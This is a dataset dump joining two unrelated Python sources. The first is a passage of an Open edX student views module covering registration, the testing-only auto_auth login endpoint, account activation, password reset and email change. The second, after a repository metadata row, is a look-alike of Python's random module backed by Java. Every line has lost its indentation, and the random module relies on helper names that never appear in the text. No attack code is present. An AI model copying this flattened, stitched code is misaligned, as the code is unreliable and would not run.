if new_user is not None:
AUDIT_LOG.info(u"Login success on new account creation - {0}".format(new_user.username))
if do_external_auth:
eamap.user = new_user
eamap.dtsignup = datetime.datetime.now(UTC)
eamap.save()
AUDIT_LOG.info(u"User registered with external_auth %s", new_user.username)
AUDIT_LOG.info(u'Updated ExternalAuthMap for %s to be %s', new_user.username, eamap)
if settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH'):
log.info('bypassing activation email')
new_user.is_active = True
new_user.save()
AUDIT_LOG.info(u"Login activated on extauth account - {0} ({1})".format(new_user.username, new_user.email))
return new_user
def _enroll_user_in_pending_courses(student):
"""
Enroll student in any pending courses he/she may have.
"""
ceas = CourseEnrollmentAllowed.objects.filter(email=student.email)
for cea in ceas:
if cea.auto_enroll:
enrollment = CourseEnrollment.enroll(student, cea.course_id)
manual_enrollment_audit = ManualEnrollmentAudit.get_manual_enrollment_by_email(student.email)
if manual_enrollment_audit is not None:
# get the enrolled by user and reason from the ManualEnrollmentAudit table.
# then create a new ManualEnrollmentAudit table entry for the same email
# different transition state.
ManualEnrollmentAudit.create_manual_enrollment_audit(
manual_enrollment_audit.enrolled_by, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
manual_enrollment_audit.reason, enrollment
)
def record_affiliate_registration_attribution(request, user):
"""
Attribute this user's registration to the referring affiliate, if
applicable.
"""
affiliate_id = request.COOKIES.get(settings.AFFILIATE_COOKIE_NAME)
if user and affiliate_id:
UserAttribute.set_user_attribute(user, REGISTRATION_AFFILIATE_ID, affiliate_id)
def record_utm_registration_attribution(request, user):
"""
Attribute this user's registration to the latest UTM referrer, if
applicable.
"""
utm_cookie_name = RegistrationCookieConfiguration.current().utm_cookie_name
utm_cookie = request.COOKIES.get(utm_cookie_name)
if user and utm_cookie:
utm = json.loads(utm_cookie)
for utm_parameter_name in REGISTRATION_UTM_PARAMETERS:
utm_parameter = utm.get(utm_parameter_name)
if utm_parameter:
UserAttribute.set_user_attribute(
user,
REGISTRATION_UTM_PARAMETERS.get(utm_parameter_name),
utm_parameter
)
created_at_unixtime = utm.get('created_at')
if created_at_unixtime:
# We divide by 1000 here because the javascript timestamp generated is in milliseconds not seconds.
# PYTHON: time.time() => 1475590280.823698
# JS: new Date().getTime() => 1475590280823
created_at_datetime = datetime.datetime.fromtimestamp(int(created_at_unixtime) / float(1000), tz=UTC)
UserAttribute.set_user_attribute(
user,
REGISTRATION_UTM_CREATED_AT,
created_at_datetime
)
def record_registration_attributions(request, user):
"""
Attribute this user's registration based on referrer cookies.
"""
record_affiliate_registration_attribution(request, user)
record_utm_registration_attribution(request, user)
@csrf_exempt
def create_account(request, post_override=None):
"""
JSON call to create new edX account.
Used by form in signup_modal.html, which is included into navigation.html
"""
warnings.warn("Please use RegistrationView instead.", DeprecationWarning)
try:
user = create_account_with_params(request, post_override or request.POST)
except AccountValidationError as exc:
return JsonResponse({'success': False, 'value': exc.message, 'field': exc.field}, status=400)
except ValidationError as exc:
field, error_list = next(exc.message_dict.iteritems())
return JsonResponse(
{
"success": False,
"field": field,
"value": error_list[0],
},
status=400
)
redirect_url = None # The AJAX method calling should know the default destination upon success
# Resume the third-party-auth pipeline if necessary.
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
redirect_url = pipeline.get_complete_url(running_pipeline['backend'])
response = JsonResponse({
'success': True,
'redirect_url': redirect_url,
})
set_logged_in_cookies(request, response, user)
return response
def auto_auth(request):
"""
Create or configure a user account, then log in as that user.
Enabled only when
settings.FEATURES['AUTOMATIC_AUTH_FOR_TESTING'] is true.
Accepts the following querystring parameters:
* `username`, `email`, and `password` for the user account
* `full_name` for the user profile (the user's full name; defaults to the username)
* `staff`: Set to "true" to make the user global staff.
* `course_id`: Enroll the student in the course with `course_id`
* `roles`: Comma-separated list of roles to grant the student in the course with `course_id`
* `no_login`: Define this to create the user but not login
* `redirect`: Set to "true" will redirect to the `redirect_to` value if set, or
course home page if course_id is defined, otherwise it will redirect to dashboard
* `redirect_to`: will redirect to to this url
If username, email, or password are not provided, use
randomly generated credentials.
"""
# Generate a unique name to use if none provided
unique_name = uuid.uuid4().hex[0:30]
# Use the params from the request, otherwise use these defaults
username = request.GET.get('username', unique_name)
password = request.GET.get('password', unique_name)
email = request.GET.get('email', unique_name + "@example.com")
full_name = request.GET.get('full_name', username)
is_staff = request.GET.get('staff', None)
is_superuser = request.GET.get('superuser', None)
course_id = request.GET.get('course_id', None)
redirect_to = request.GET.get('redirect_to', None)
# mode has to be one of 'honor'/'professional'/'verified'/'audit'/'no-id-professional'/'credit'
enrollment_mode = request.GET.get('enrollment_mode', 'honor')
course_key = None
if course_id:
course_key = CourseLocator.from_string(course_id)
role_names = [v.strip() for v in request.GET.get('roles', '').split(',') if v.strip()]
redirect_when_done = request.GET.get('redirect', '').lower() == 'true' or redirect_to
login_when_done = 'no_login' not in request.GET
form = AccountCreationForm(
data={
'username': username,
'email': email,
'password': password,
'name': full_name,
},
tos_required=False
)
# Attempt to create the account.
# If successful, this will return a tuple containing
# the new user object.
try:
user, profile, reg = _do_create_account(form)
except (AccountValidationError, ValidationError):
# Attempt to retrieve the existing user.
user = User.objects.get(username=username)
user.email = email
user.set_password(password)
user.save()
profile = UserProfile.objects.get(user=user)
reg = Registration.objects.get(user=user)
# Set the user's global staff bit
if is_staff is not None:
user.is_staff = (is_staff == "true")
user.save()
if is_superuser is not None:
user.is_superuser = (is_superuser == "true")
user.save()
# Activate the user
reg.activate()
reg.save()
# ensure parental consent threshold is met
year = datetime.date.today().year
age_limit = settings.PARENTAL_CONSENT_AGE_LIMIT
profile.year_of_birth = (year - age_limit) - 1
profile.save()
# Enroll the user in a course
if course_key is not None:
CourseEnrollment.enroll(user, course_key, mode=enrollment_mode)
# Apply the roles
for role_name in role_names:
role = Role.objects.get(name=role_name, course_id=course_key)
user.roles.add(role)
# Log in as the user
if login_when_done:
user = authenticate(username=username, password=password)
login(request, user)
create_comments_service_user(user)
# Provide the user with a valid CSRF token
# then return a 200 response unless redirect is true
if redirect_when_done:
# Redirect to specific page if specified
if redirect_to:
redirect_url = redirect_to
# Redirect to course info page if course_id is known
elif course_id:
try:
# redirect to course info page in LMS
redirect_url = reverse(
'info',
kwargs={'course_id': course_id}
)
except NoReverseMatch:
# redirect to course outline page in Studio
redirect_url = reverse(
'course_handler',
kwargs={'course_key_string': course_id}
)
else:
try:
# redirect to dashboard for LMS
redirect_url = reverse('dashboard')
except NoReverseMatch:
# redirect to home for Studio
redirect_url = reverse('home')
return redirect(redirect_url)
elif request.META.get('HTTP_ACCEPT') == 'application/json':
response = JsonResponse({
'created_status': u"Logged in" if login_when_done else "Created",
'username': username,
'email': email,
'password': password,
'user_id': user.id, # pylint: disable=no-member
'anonymous_id': anonymous_id_for_user(user, None),
})
else:
success_msg = u"{} user {} ({}) with password {} and user_id {}".format(
u"Logged in" if login_when_done else "Created",
username, email, password, user.id # pylint: disable=no-member
)
response = HttpResponse(success_msg)
response.set_cookie('csrftoken', csrf(request)['csrf_token'])
return response
@ensure_csrf_cookie
def activate_account(request, key):
"""When link in activation e-mail is clicked"""
regs = Registration.objects.filter(activation_key=key)
if len(regs) == 1:
user_logged_in = request.user.is_authenticated()
already_active = True
if not regs[0].user.is_active:
regs[0].activate()
already_active = False
# Enroll student in any pending courses he/she may have if auto_enroll flag is set
_enroll_user_in_pending_courses(regs[0].user)
resp = render_to_response(
"registration/activation_complete.html",
{
'user_logged_in': user_logged_in,
'already_active': already_active
}
)
return resp
if len(regs) == 0:
return render_to_response(
"registration/activation_invalid.html",
{'csrf': csrf(request)['csrf_token']}
)
return HttpResponseServerError(_("Unknown error. Please e-mail us to let us know how it happened."))
@csrf_exempt
@require_POST
def password_reset(request):
""" Attempts to send a password reset e-mail. """
# Add some rate limiting here by re-using the RateLimitMixin as a helper class
limiter = BadRequestRateLimiter()
if limiter.is_rate_limit_exceeded(request):
AUDIT_LOG.warning("Rate limit exceeded in password_reset")
return HttpResponseForbidden()
form = PasswordResetFormNoActive(request.POST)
if form.is_valid():
form.save(use_https=request.is_secure(),
from_email=configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL),
request=request,
domain_override=request.get_host())
# When password change is complete, a "edx.user.settings.changed" event will be emitted.
# But because changing the password is multi-step, we also emit an event here so that we can
# track where the request was initiated.
tracker.emit(
SETTING_CHANGE_INITIATED,
{
"setting": "password",
"old": None,
"new": None,
"user_id": request.user.id,
}
)
destroy_oauth_tokens(request.user)
else:
# bad user? tick the rate limiter counter
AUDIT_LOG.info("Bad password_reset user passed in.")
limiter.tick_bad_request_counter(request)
return JsonResponse({
'success': True,
'value': render_to_string('registration/password_reset_done.html', {}),
})
def uidb36_to_uidb64(uidb36):
"""
Needed to support old password reset URLs that use base36-encoded user IDs
https://github.com/django/django/commit/1184d077893ff1bc947e45b00a4d565f3df81776#diff-c571286052438b2e3190f8db8331a92bR231
Args:
uidb36: base36-encoded user ID
Returns: base64-encoded user ID. Otherwise returns a dummy, invalid ID
"""
try:
uidb64 = force_text(urlsafe_base64_encode(force_bytes(base36_to_int(uidb36))))
except ValueError:
uidb64 = '1' # dummy invalid ID (incorrect padding for base64)
return uidb64
def validate_password(user, password):
"""
Tie in password policy enforcement as an optional level of
security protection
Args:
user: the user object whose password we're checking.
password: the user's proposed new password.
Returns:
is_valid_password: a boolean indicating if the new password
passes the validation.
err_msg: an error message if there's a violation of one of the password
checks. Otherwise, `None`.
"""
err_msg = None
if settings.FEATURES.get('ENFORCE_PASSWORD_POLICY', False):
try:
validate_password_strength(password)
except ValidationError as err:
err_msg = _('Password: ') + '; '.join(err.messages)
# also, check the password reuse policy
if not PasswordHistory.is_allowable_password_reuse(user, password):
if user.is_staff:
num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STAFF_PASSWORDS_BEFORE_REUSE']
else:
num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STUDENT_PASSWORDS_BEFORE_REUSE']
# Because of how ngettext is, splitting the following into shorter lines would be ugly.
# pylint: disable=line-too-long
err_msg = ungettext(
"You are re-using a password that you have used recently. You must have {num} distinct password before reusing a previous password.",
"You are re-using a password that you have used recently. You must have {num} distinct passwords before reusing a previous password.",
num_distinct
).format(num=num_distinct)
# also, check to see if passwords are getting reset too frequent
if PasswordHistory.is_password_reset_too_soon(user):
num_days = settings.ADVANCED_SECURITY_CONFIG['MIN_TIME_IN_DAYS_BETWEEN_ALLOWED_RESETS']
# Because of how ngettext is, splitting the following into shorter lines would be ugly.
# pylint: disable=line-too-long
err_msg = ungettext(
"You are resetting passwords too frequently. Due to security policies, {num} day must elapse between password resets.",
"You are resetting passwords too frequently. Due to security policies, {num} days must elapse between password resets.",
num_days
).format(num=num_days)
is_password_valid = err_msg is None
return is_password_valid, err_msg
def password_reset_confirm_wrapper(request, uidb36=None, token=None):
"""
A wrapper around django.contrib.auth.views.password_reset_confirm.
Needed because we want to set the user as active at this step.
We also optionally do some additional password policy checks.
"""
# convert old-style base36-encoded user id to base64
uidb64 = uidb36_to_uidb64(uidb36)
platform_name = {
"platform_name": configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
}
try:
uid_int = base36_to_int(uidb36)
user = User.objects.get(id=uid_int)
except (ValueError, User.DoesNotExist):
# if there's any error getting a user, just let django's
# password_reset_confirm function handle it.
return password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
if request.method == 'POST':
password = request.POST['new_password1']
is_password_valid, password_err_msg = validate_password(user, password)
if not is_password_valid:
# We have a password reset attempt which violates some security
# policy. Use the existing Django template to communicate that
# back to the user.
context = {
'validlink': False,
'form': None,
'title': _('Password reset unsuccessful'),
'err_msg': password_err_msg,
}
context.update(platform_name)
return TemplateResponse(
request, 'registration/password_reset_confirm.html', context
)
# remember what the old password hash is before we call down
old_password_hash = user.password
response = password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
# If password reset was unsuccessful a template response is returned (status_code 200).
# Check if form is invalid then show an error to the user.
# Note if password reset was successful we get response redirect (status_code 302).
if response.status_code == 200 and not response.context_data['form'].is_valid():
response.context_data['err_msg'] = _('Error in resetting your password. Please try again.')
return response
# get the updated user
updated_user = User.objects.get(id=uid_int)
# did the password hash change, if so record it in the PasswordHistory
if updated_user.password != old_password_hash:
entry = PasswordHistory()
entry.create(updated_user)
else:
response = password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
response_was_successful = response.context_data.get('validlink')
if response_was_successful and not user.is_active:
user.is_active = True
user.save()
return response
def reactivation_email_for_user(user):
try:
reg = Registration.objects.get(user=user)
except Registration.DoesNotExist:
return JsonResponse({
"success": False,
"error": _('No inactive user with this e-mail exists'),
}) # TODO: this should be status code 400 # pylint: disable=fixme
context = {
'name': user.profile.name,
'key': reg.activation_key,
}
subject = render_to_string('emails/activation_email_subject.txt', context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/activation_email.txt', context)
from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
try:
user.email_user(subject, message, from_address)
except Exception: # pylint: disable=broad-except
log.error(
u'Unable to send reactivation email from "%s" to "%s"',
from_address,
user.email,
exc_info=True
)
return JsonResponse({
"success": False,
"error": _('Unable to send reactivation email')
}) # TODO: this should be status code 500 # pylint: disable=fixme
return JsonResponse({"success": True})
def validate_new_email(user, new_email):
"""
Given a new email for a user, does some basic verification of the new address If any issues are encountered
with verification a ValueError will be thrown.
"""
try:
validate_email(new_email)
except ValidationError:
raise ValueError(_('Valid e-mail address required.'))
if new_email == user.email:
raise ValueError(_('Old email is the same as the new email.'))
if User.objects.filter(email=new_email).count() != 0:
raise ValueError(_('An account with this e-mail already exists.'))
def do_email_change_request(user, new_email, activation_key=None):
"""
Given a new email for a user, does some basic verification of the new address and sends an activation message
to the new address. If any issues are encountered with verification or sending the message, a ValueError will
be thrown.
"""
pec_list = PendingEmailChange.objects.filter(user=user)
if len(pec_list) == 0:
pec = PendingEmailChange()
pec.user = user
else:
pec = pec_list[0]
# if activation_key is not passing as an argument, generate a random key
if not activation_key:
activation_key = uuid.uuid4().hex
pec.new_email = new_email
pec.activation_key = activation_key
pec.save()
context = {
'key': pec.activation_key,
'old_email': user.email,
'new_email': pec.new_email
}
subject = render_to_string('emails/email_change_subject.txt', context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/email_change.txt', context)
from_address = configuration_helpers.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
try:
mail.send_mail(subject, message, from_address, [pec.new_email])
except Exception: # pylint: disable=broad-except
log.error(u'Unable to send email activation link to user from "%s"', from_address, exc_info=True)
raise ValueError(_('Unable to send email activation link. Please try again later.'))
# When the email address change is complete, a "edx.user.settings.changed" event will be emitted.
# But because changing the email address is multi-step, we also emit an event here so that we can
# track where the request was initiated.
tracker.emit(
SETTING_CHANGE_INITIATED,
{
"setting": "email",
"old": context['old_email'],
"new": context['new_email'],
"user_id": user.id,
}
)
@ensure_csrf_cookie
def confirm_email_change(request, key): # pylint: disable=unused-argument
"""
User requested a new e-mail. This is called when the activation
link is clicked. We confirm with the old e-mail, and update
"""
with transaction.atomic():
try:
pec = PendingEmailChange.objects.get(activation_key=key)
except PendingEmailChange.DoesNotExist:
response = render_to_response("invalid_email_key.html", {})
transaction.set_rollback(True)
return response
user = pec.user
address_context = {
'old_email': user.email,
'new_email': pec.new_email
}
if len(User.objects.filter(email=pec.new_email)) != 0:
response = render_to_response("email_exists.html", {})
transaction.set_rollback(True)
return response
subject = render_to_string('emails/email_change_subject.txt', address_context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/confirm_email_change.txt', address_context)
u_prof = UserProfile.objects.get(user=user)
meta = u_prof.get_meta()
if 'old_emails' not in meta:
meta['old_emails'] = []
meta['old_emails'].append([user.email, datetime.datetime.now(UTC).isoformat()])
u_prof.set_meta(meta)
u_prof.save()
# Send it to the old email...
try:
user.email_user(
subject,
message,
configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
)
except Exception: # pylint: disable=broad-except
log.warning('Unable to send confirmation email to old address', exc_info=True)
response = render_to_response("email_change_failed.html", {'email': user.email})
transaction.set_rollback(True)
return response
user.email = pec.new_email
user.save()
pec.delete()
# And send it to the new email...
try:
user.email_user(
subject,
message,
configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
)
except Exception: # pylint: disable=broad-except
log.warning('Unable to send confirmation email to new address', exc_info=True)
response = render_to_response("email_change_failed.html", {'email': pec.new_email})
transaction.set_rollback(True)
return response
response = render_to_response("email_change_successful.html", address_context)
return response
@require_POST
@login_required
@ensure_csrf_cookie
def change_email_settings(request):
"""Modify logged-in user's setting for receiving emails from a course."""
user = request.user
course_id = request.POST.get("course_id")
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
receive_emails = request.POST.get("receive_emails")
if receive_emails:
optout_object = Optout.objects.filter(user=user, course_id=course_key)
if optout_object:
optout_object.delete()
log.info(
u"User %s (%s) opted in to receive emails from course %s",
user.username,
user.email,
course_id,
)
track.views.server_track(
request,
"change-email-settings",
{"receive_emails": "yes", "course": course_id},
page='dashboard',
)
else:
Optout.objects.get_or_create(user=user, course_id=course_key)
log.info(
u"User %s (%s) opted out of receiving emails from course %s",
user.username,
user.email,
course_id,
)
track.views.server_track(
request,
"change-email-settings",
{"receive_emails": "no", "course": course_id},
page='dashboard',
)
return JsonResponse({"success": True})
class LogoutView(TemplateView):
"""
Logs out user and redirects.
The template should load iframes to log the user out of OpenID Connect services.
See http://openid.net/specs/openid-connect-logout-1_0.html.
"""
oauth_client_ids = []
template_name = 'logout.html'
# Keep track of the page to which the user should ultimately be redirected.
target = reverse_lazy('cas-logout') if settings.FEATURES.get('AUTH_USE_CAS') else '/'
def dispatch(self, request, *args, **kwargs): # pylint: disable=missing-docstring
# We do not log here, because we have a handler registered to perform logging on successful logouts.
request.is_from_logout = True
# Get the list of authorized clients before we clear the session.
self.oauth_client_ids = request.session.get(edx_oauth2_provider.constants.AUTHORIZED_CLIENTS_SESSION_KEY, [])
logout(request)
# If we don't need to deal with OIDC logouts, just redirect the user.
if LogoutViewConfiguration.current().enabled and self.oauth_client_ids:
response = super(LogoutView, self).dispatch(request, *args, **kwargs)
else:
response = redirect(self.target)
# Clear the cookie used by the edx.org marketing site
delete_logged_in_cookies(response)
return response
def _build_logout_url(self, url):
"""
Builds a logout URL with the `no_redirect` query string parameter.
Args:
url (str): IDA logout URL
Returns:
str
"""
scheme, netloc, path, query_string, fragment = urlsplit(url)
query_params = parse_qs(query_string)
query_params['no_redirect'] = 1
new_query_string = urlencode(query_params, doseq=True)
return urlunsplit((scheme, netloc, path, new_query_string, fragment))
def get_context_data(self, **kwargs):
context = super(LogoutView, self).get_context_data(**kwargs)
# Create a list of URIs that must be called to log the user out of all of the IDAs.
uris = Client.objects.filter(client_id__in=self.oauth_client_ids,
logout_uri__isnull=False).values_list('logout_uri', flat=True)
referrer = self.request.META.get('HTTP_REFERER', '').strip('/')
logout_uris = []
for uri in uris:
if not referrer or (referrer and not uri.startswith(referrer)):
logout_uris.append(self._build_logout_url(uri))
context.update({
'target': self.target,
'logout_uris': logout_uris,
})
return context
|
itsjeyd/edx-platform
|
common/djangoapps/student/views.py
|
Python
|
agpl-3.0
| 107,769
|
[
"VisIt"
] |
737d150ee3aa6d62ebb66c2628d3e109a84073f1a026a2733f9af3121db11304
|
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
"""
# python random module look-a-like. Uses wrapped java.util.Random for actual random generation
class Random:
"""
Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state. Especially useful for multi-threaded programs, creating
a different instance of Random for each thread.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), setstate() and jumpahead().
"""
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self._jrandom = javainstance("__random__")
self.random = self._jrandom.random
self.seed = self._jrandom.seed
self.getstate = self._jrandom.getstate
self.setstate = self._jrandom.setstate
self.randrange = self._jrandom.randrange
self.randint = self._jrandom.randint
self.getrandbits = self._jrandom.getrandbits
if not x is None:
self.seed(x)
self.gauss_next = None
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty
def shuffle(self, x, random=None):
"""x, random=random.random -> shuffle list x in place; return None.
Optional arg random is a 0-argument function returning a random
float in [0.0, 1.0); by default, the standard random.random.
"""
if random is None:
random = self.random
_int = int
for i in reversed(xrange(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = _int(random() * (i+1))
x[i], x[j] = x[j], x[i]
def sample(self, population, k):
"""Chooses k unique random elements from a population sequence.
Returns a new list containing elements from the population while
leaving the original population unchanged. The resulting list is
in selection order so that all sub-slices will also be valid random
samples. This allows raffle winners (the sample) to be partitioned
into grand prize and second place winners (the subslices).
Members of the population need not be hashable or unique. If the
population contains repeats, then each occurrence is a possible
selection in the sample.
To choose a sample in a range of integers, use xrange as an argument.
This is especially fast and space efficient for sampling from a
large population: sample(xrange(10000000), 60)
"""
# Sampling without replacement entails tracking either potential
# selections (the pool) in a list or previous selections in a set.
# When the number of selections is small compared to the
# population, then tracking selections is efficient, requiring
# only a small set and an occasional reselection. For
# a larger number of selections, the pool tracking method is
# preferred since the list takes less space than the
# set and it doesn't suffer from frequent reselections.
n = len(population)
if not 0 <= k <= n:
raise ValueError("sample larger than population")
random = self.random
_int = int
result = [None] * k
setsize = 21 # size of a small set minus size of an empty list
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
if n <= setsize or hasattr(population, "keys"):
# An n-length list is smaller than a k-length set, or this is a
# mapping type so the other algorithm wouldn't work.
pool = list(population)
for i in xrange(k): # invariant: non-selected at [0,n-i)
j = _int(random() * (n-i))
result[i] = pool[j]
pool[j] = pool[n-i-1] # move non-selected item into vacancy
else:
try:
selected = set()
selected_add = selected.add
for i in xrange(k):
j = _int(random() * n)
while j in selected:
j = _int(random() * n)
selected_add(j)
result[i] = population[j]
except (TypeError, KeyError): # handle (at least) sets
if isinstance(population, list):
raise
return self.sample(tuple(population), k)
return result
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
def triangular(self, low=0.0, high=1.0, mode=None):
"""Triangular distribution.
Continuous distribution bounded by given lower and upper limits,
and having a given mode value in-between.
http://en.wikipedia.org/wiki/Triangular_distribution
"""
u = self.random()
try:
c = 0.5 if mode is None else (mode - low) / (high - low)
except ZeroDivisionError:
return low
if u > c:
u = 1.0 - u
c = 1.0 - c
low, high = high, low
return low + (high - low) * (u * c) ** 0.5
## -------------------- normal distribution --------------------
def normalvariate(self, mu, sigma):
"""Normal distribution.
mu is the mean, and sigma is the standard deviation.
"""
# mu = mean, sigma = standard deviation
# Uses Kinderman and Monahan method. Reference: Kinderman,
# A.J. and Monahan, J.F., "Computer generation of random
# variables using the ratio of uniform deviates", ACM Trans
# Math Software, 3, (1977), pp257-260.
random = self.random
while 1:
u1 = random()
u2 = 1.0 - random()
z = NV_MAGICCONST*(u1-0.5)/u2
zz = z*z/4.0
if zz <= -_log(u2):
break
return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
def vonmisesvariate(self, mu, kappa):
"""Circular data distribution.
mu is the mean angle, expressed in radians between 0 and 2*pi, and
kappa is the concentration parameter, which must be greater than or
equal to zero. If kappa is equal to zero, this distribution reduces
to a uniform random angle over the range 0 to 2*pi.
"""
# mu: mean angle (in radians between 0 and 2*pi)
# kappa: concentration parameter kappa (>= 0)
# if kappa = 0 generate uniform random angle
# Based upon an algorithm published in: Fisher, N.I.,
# "Statistical Analysis of Circular Data", Cambridge
# University Press, 1993.
# Thanks to Magnus Kessler for a correction to the
# implementation of step 4.
random = self.random
if kappa <= 1e-6:
return TWOPI * random()
s = 0.5 / kappa
r = s + _sqrt(1.0 + s * s)
while 1:
u1 = random()
z = _cos(_pi * u1)
d = z / (r + z)
u2 = random()
if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
break
q = 1.0 / r
f = (q + z) / (1.0 + q * z)
u3 = random()
if u3 > 0.5:
theta = (mu + _acos(f)) % TWOPI
else:
theta = (mu - _acos(f)) % TWOPI
return theta
## -------------------- gamma distribution --------------------
def gammavariate(self, alpha, beta):
"""Gamma distribution. Not the gamma function!
Conditions on the parameters are alpha > 0 and beta > 0.
The probability distribution function is:
x ** (alpha - 1) * math.exp(-x / beta)
pdf(x) = --------------------------------------
math.gamma(alpha) * beta ** alpha
"""
# alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
# Warning: a few older sources define the gamma distribution in terms
# of alpha > -1.0
if alpha <= 0.0 or beta <= 0.0:
raise ValueError, 'gammavariate: alpha and beta must be > 0.0'
random = self.random
if alpha > 1.0:
# Uses R.C.H. Cheng, "The generation of Gamma
# variables with non-integral shape parameters",
# Applied Statistics, (1977), 26, No. 1, p71-74
ainv = _sqrt(2.0 * alpha - 1.0)
bbb = alpha - LOG4
ccc = alpha + ainv
while 1:
u1 = random()
if not 1e-7 < u1 < .9999999:
continue
u2 = 1.0 - random()
v = _log(u1/(1.0-u1))/ainv
x = alpha*_exp(v)
z = u1*u1*u2
r = bbb+ccc*v-x
if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
return x * beta
elif alpha == 1.0:
# expovariate(1)
u = random()
while u <= 1e-7:
u = random()
return -_log(u) * beta
else: # alpha is between 0 and 1 (exclusive)
# Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
while 1:
u = random()
b = (_e + alpha)/_e
p = b*u
if p <= 1.0:
x = p ** (1.0/alpha)
else:
x = -_log((b-p)/alpha)
u1 = random()
if p > 1.0:
if u1 <= x ** (alpha - 1.0):
break
elif u1 <= _exp(-x):
break
return x * beta
## -------------------- Gauss (faster alternative) --------------------
def gauss(self, mu, sigma):
"""Gaussian distribution.
mu is the mean, and sigma is the standard deviation. This is
slightly faster than the normalvariate() function.
Not thread-safe without a lock around calls.
"""
# When x and y are two variables from [0, 1), uniformly
# distributed, then
#
# cos(2*pi*x)*sqrt(-2*log(1-y))
# sin(2*pi*x)*sqrt(-2*log(1-y))
#
# are two *independent* variables with normal distribution
# (mu = 0, sigma = 1).
# (Lambert Meertens)
# (corrected version; bug discovered by Mike Miller, fixed by LM)
# Multithreading note: When two threads call this function
# simultaneously, it is possible that they will receive the
# same return value. The window is very small though. To
# avoid this, you have to use a lock around all calls. (I
# didn't want to slow this down in the serial case by using a
# lock here.)
random = self.random
z = self.gauss_next
self.gauss_next = None
if z is None:
x2pi = random() * TWOPI
g2rad = _sqrt(-2.0 * _log(1.0 - random()))
z = _cos(x2pi) * g2rad
self.gauss_next = _sin(x2pi) * g2rad
return mu + z*sigma
## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / pow(u, 1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * pow(-_log(u), 1.0/beta)
# Create one instance, seeded by java, and export its methods
# as module-level functions. The functions share state across all uses
# (both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
